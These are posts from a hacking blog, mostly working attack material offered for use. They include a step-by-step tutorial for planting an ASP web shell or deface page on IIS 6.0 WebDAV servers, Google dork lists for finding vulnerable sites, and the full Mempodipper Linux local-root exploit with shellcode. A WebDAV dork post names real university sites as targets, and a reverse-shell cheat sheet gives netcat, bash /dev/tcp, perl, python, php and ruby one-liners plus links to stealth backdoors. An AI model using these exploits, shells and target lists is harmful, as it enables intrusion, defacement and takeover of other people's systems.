BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Tuesday, January 31, 2012

[TuT] Exploiting Microsoft/IIS 6.0 WebDAV - Uploading Files

0 comments
Today I will be teaching a way to exploit very common a vulnerability and upload your shell and/or deface page to a Microsoft IIS 6.0 based website.

What you will need:
A windows machine.
Basic knowledge of shells.
A Microsoft/IIS 6.0 website with WebDAV enabled.
An ASP shell. - http://www.[removed].com/?d=YU209ET7 << Download link for the shell. (Do not even try a PHP shell, it won't work. You can use your ASP shell to upload your PHP shell after though.)


This is how to perform the exploit in Windows 7:
Click start > Computer.
You will see this page: http://img851.imageshack.us/i/iis1.png/[/img]

Next you will want to click "Map network drive", it has been circled in the picture above.
Now a window will pop-up, it should look like this: http://img638.imageshack.us/i/iis2.png/

As you can see again. I have circled what needs to be clicked. So click on that then a window will come up asking you to click "Next", do so. After you have clicked the "Next" button, you should see this: http://img850.imageshack.us/i/iis3.png/

You will need to highlight/click that folder I circled, then hit the "Next" button once again. It should redirect you to this page: http://img21.imageshack.us/i/iis4.png/[/img]

I put "www.vulnerablesite.com" as an example. You have to type in "http://vulnerablesite.com" otherwise it will not work. It requires HTTP, not WWW. You will receive an error unless you use HTTP (once again, http://vulnerablesite.com)
Hit the "Next" button again, then it should come up with the site name with the output "vulnerablesite.com", you can name it whatever you like, this is what I put:http://img130.imageshack.us/i/iis5.png/

Except I changed it to "IIS 6.0 Exploit for HF - Phizo".
It doesn't matter what you put, just make sure you remember it.
Make sure the box is ticked (open when finished) then go ahead and hit finish.
Okay, we've exploited the website. Now we want to upload our files to the website. A new window has just opened, as you can see, we're connected to the websites files, however we're not aloud to view the files as we're unauthorized. No matter, we can still upload our shells and what other files we would like to upload.
Okay, I don't think I will need to put any pictures in this one, it's that simple. Follow my instructions:
#1 - Open the directory of where your ASP shell is (example: desktop, documents, or custom folder). Your ASP shell should have a name similar to "shell.asp;anything.jpg".
#2 - Drag your ASP shell from your custom folder into the website folder we just exploited. It should just go straight in there with no problems.
Tada! We have successfully uploaded our shell! Now all we have to do is go to: http://vulnerablesite.com/shell.asp;anything.jpg.

I hope this helps.
©2011, copyright BLACK BURN

Dorks, using dorks, finding dorks

0 comments
[small tut]Dorks, using dorks, finding dorks.
For educational purposes only!

Usefull sites.
You could also look for exclusife dorks and original exploits on:
http://www.exploit-db.com/
http://1337day.com/
http://hackingexpose.blogspot.com/
http://sekurity.tumblr.com/

Dork lists on: SQLI, XSS, LFI, RFI, RTE.

RANDOM very usefull dorks! 
http://pastebin.com/sX85tSEY <- gold worth!

SQLI sQl Injection
http://pastebin.com/dzQRHqhu
http://pastebin.com/0FqmasC7 <-from kobez.
http://pastebin.com/x1rtqktj <-from kobez.
http://pastebin.com/APxqavu9 <-from kobez.

XSS Cross Site Scripting
http://pastebin.com/85JiHniy

lfi Local File Inclusion
http://pastebin.com/FBpYuZRh 

RFI Remote File Inclusion
http://pastebin.com/zevqd3fR 

RTE Remote File Upload
http://pastebin.com/b05LyBm9

LFD Local File Disclosure.
http://pastebin.com/HBLrBL0B
©2011, copyright BLACK BURN

[tut] Creating google dorks

0 comments
Hello, Real steel here whit another tutorial!.

In this tutorial i will explain how to create your own dorks,
Advanced dorks!

Do you really think inurl: is the only google dork that you can use?
Wrong there are many you can use!


intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
froogle:
info:
movie:
weather:
related:
link:


These also help yo find other things then vulnerables.
Happy googling!

Anyway i was going to show how to use some for finding fulnerables.

intitle:
intitle:rte/file_uploud (this is an example to find rte vulnerables.)

you can use the intitle to find anything in the title of the website.
which also could be usefull to find downloads or anything else.

inurl:
inurl:index.php?id= (we allready know this one)

The inurl basicly looks for enything after the: in the site urls. (obvious)

intext:
intext:"powered by mybb" (This one is awesome!)

you can find literally everything here.
you could even use the inurl dorks whit this.

anyway whit this we could find sertain messages in a site whe can use.
my message looks for all mybb forums.

which means if i ever find a vulnerable in mybb forum.
and know how to locate it!
then i can find every mybb forum whit this dork.

define:
define:"sql syntax error" (google defines you message)

google will difine this massage and will look for what had this error for example i gave.

site:
Obvious, google looks for a site.
site:cocacola (google will look for any site related whit cocacola.)

phonebook:
Do i really need to explain this?
give in a name and google will look for the phone number related to it.

maps:
Google will look on google maps for your search.

book:
book:java language (this will look for any book gogole hase indexed whit java language in it.)
Google hase an online library.
if you want to find interesting books use this dork.

froogle:
Uses froogle search instead of google.

info:
info:firefox (google uses many info sites.)
This is usefull. 
google looks for anything you inputted but only information about it.
the example i gave firefox.
google will get you alot off things explaining what firefox is.

movie:
if you do this,
you can find alot about movies on google.

movie:watch hackers2 online

together whit some of your own context google will serve you any movie.
(movie which is not just a site whit advertisements: grr)
but any movie file usefull for this dork.
have fun watching!

weather:
weather: 21/12/2011 london

Obvious aint it?

related:
related:egg (google responds whit sites about chickons laying eggs.)
this will look for anything related to what you input.

link:
link:index.php?id= (this is verry usefull i would say even more then inurl.)
People always show the inurl methode?
this one works bether instead of only looking in search url it will also look in the site for urls
that possibly are vulnerable.

Happy googling, hacking!
©2011, copyright BLACK BURN

Linux Local Root for => 2.6.39, 32-bit and 64-bit

1 comments
# Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056


Code:
/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
char *socket_path = "/tmp/.sockpuppet";
int send_fd(int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    int n;
    int sock;
    char cms[CMSG_SPACE(sizeof(int))];
    if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;
    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = CMSG_LEN(sizeof(int));
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
    if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
        return -1;
    close(sock);
    return 0;
}
int recv_fd()
{
    int listener;
    int sock;
    int n;
    int fd;
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    char cms[CMSG_SPACE(sizeof(int))];
    if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    unlink(socket_path);
    if (bind(listener, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;
    if (listen(listener, 1) < 0)
        return -1;
    if ((sock = accept(listener, NULL, NULL)) < 0)
        return -1;
    iov.iov_base = buf;
    iov.iov_len = 1;
    memset(&msg, 0, sizeof msg);
    msg.msg_name = 0;
    msg.msg_namelen = 0;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = sizeof cms;
    if ((n = recvmsg(sock, &msg, 0)) < 0)
        return -1;
    if (n == 0)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
    close(sock);
    close(listener);
    return fd;
}
int main(int argc, char **argv)
{
    if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
        char parent_mem[256];
        sprintf(parent_mem, "/proc/%s/mem", argv[2]);
        printf("[+] Opening parent mem %s in child.\n", parent_mem);
        int fd = open(parent_mem, O_RDWR);
        if (fd < 0) {
            perror("[-] open");
            return 1;
        }
        printf("[+] Sending fd %d to parent.\n", fd);
        send_fd(fd);
        return 0;
    }
    printf("===============================\n");
    printf("=          Mempodipper        =\n");
    printf("=           by zx2c4          =\n");
    printf("=         Jan 21, 2012        =\n");
    printf("===============================\n\n");
    int parent_pid = getpid();
    if (fork()) {
        printf("[+] Waiting for transferred fd in parent.\n");
        int fd = recv_fd();
        printf("[+] Received fd at %d.\n", fd);
        if (fd < 0) {
            perror("[-] recv_fd");
            return -1;
        }
        printf("[+] Assigning fd %d to stderr.\n", fd);
        dup2(2, 6);
        dup2(fd, 2);
        unsigned long address;
        if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
            address = strtoul(argv[2], NULL, 16);
        else {
            printf("[+] Reading su for exit@plt.\n");
            // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
            FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
            char result[32];
            result[0] = 0;
            fgets(result, 32, command);
            pclose(command);
            address = strtoul(result, NULL, 16);
            if (address == ULONG_MAX || !address) {
                printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
                printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
                return 1;
            }
            printf("[+] Resolved exit@plt to 0x%lx.\n", address);
        }
        printf("[+] Calculating su padding.\n");
        FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
        char result[256];
        result[0] = 0;
        fgets(result, 256, command);
        pclose(command);
        unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
        unsigned long offset = address - su_padding;
        printf("[+] Seeking to offset 0x%lx.\n", offset);
        lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
        // See shellcode-32.s in this package for the source.
        char shellcode[] =
            "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
            "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
            "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
            "\x80";
#elif defined(__x86_64__)
        // See shellcode-64.s in this package for the source.
        char shellcode[] =
            "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
            "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
            "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
            "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
            "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
        printf("[+] Executing su with shellcode.\n");
        execl("/bin/su", "su", shellcode, NULL);
    } else {
        char pid[32];
        sprintf(pid, "%d", parent_pid);
        printf("[+] Executing child from child fork.\n");
        execl("/proc/self/exe", argv[0], "-c", pid, NULL);
    }
}

©2011, copyright BLACK BURN

Webdav vulnerability google dork. +3,000 sites infected

4 comments
Google dork:

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"

or 

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY

Just add the /webdav extension to the URL if you found "WebDAV testpage"

So go ahead it's Webdav vulnerability hackable :)

Example:

http://www.hebron.edu/webdav/
http://www.jcjc.edu/webdav/
http://archnet.asu.edu/webdav/
http://mvl.mit.edu/webdav/
http://www.engl.niu.edu/webdav/
http://www.mstc.edu/webdav/

Enjoy.
©2011, copyright BLACK BURN

Having trouble back-connecting? Here ya go!

0 comments
Getting quite a few pms about back-connection recently. Heres my cheatsheet on doing it manually using what the server gives you. This is more or less a backup if a) your webshells aren't working, and b) you don't know why you can't back-connect. Hopefully you won't get stuck again.

After doing recon on your target, assess what you have access to and simply cherry-pick from below. Or just try them all, why the hell not.

1. netcat with GAPING_SECURITY_HOLE enabled:

Code:
TARGET:nc 192.168.1.133 8080 -e /bin/bash
ATTACKER:nc -n -vv -l -p 8080

2. netcat with GAPING_SECURITY_HOLE disabled:

Code:
TARGET:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

3. /dev/tcp socket hack

Code:
TARGET:/bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1
ATTACKER:nc -n -vv -l -p 8080

4.no nc or dev/tcp installed?
Code:
TARGET:mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

5.backup- no good reason to use ahead of the others

Code:
TARGET:telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
ATTACKER:nc -n -vv -l -p 8080
ATTACKER2:nc -n -vv -l -p 8888

6.straight bash

Code:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7.Inline perl
Code:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

8.Python 
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec​t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

9.php inline

Code:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

10. Ruby

Code:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

11.xterm (if available)

Code:
xterm -display 10.0.0.1:1



Code:
Php-findsock-shell- designed to bypass egres filtering (fucking firewalls =]) -http://pentestmonkey.net/tools/web-shells/php-findsock-shell

Code:
Weevely- avoid bind shell/reverse shell via console over http - http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html

Code:
WeBaCoo- stealth^2 - http://packetstormsecurity.org/files/108009/webacoo-0.2.zip

But what if I still cant back-connect or nothing happens? - track down the server and take a fucking sledgehammer to it -_-!
©2011, copyright BLACK BURN
 

7 Years Earning Experience

The Earning Source You Can Trust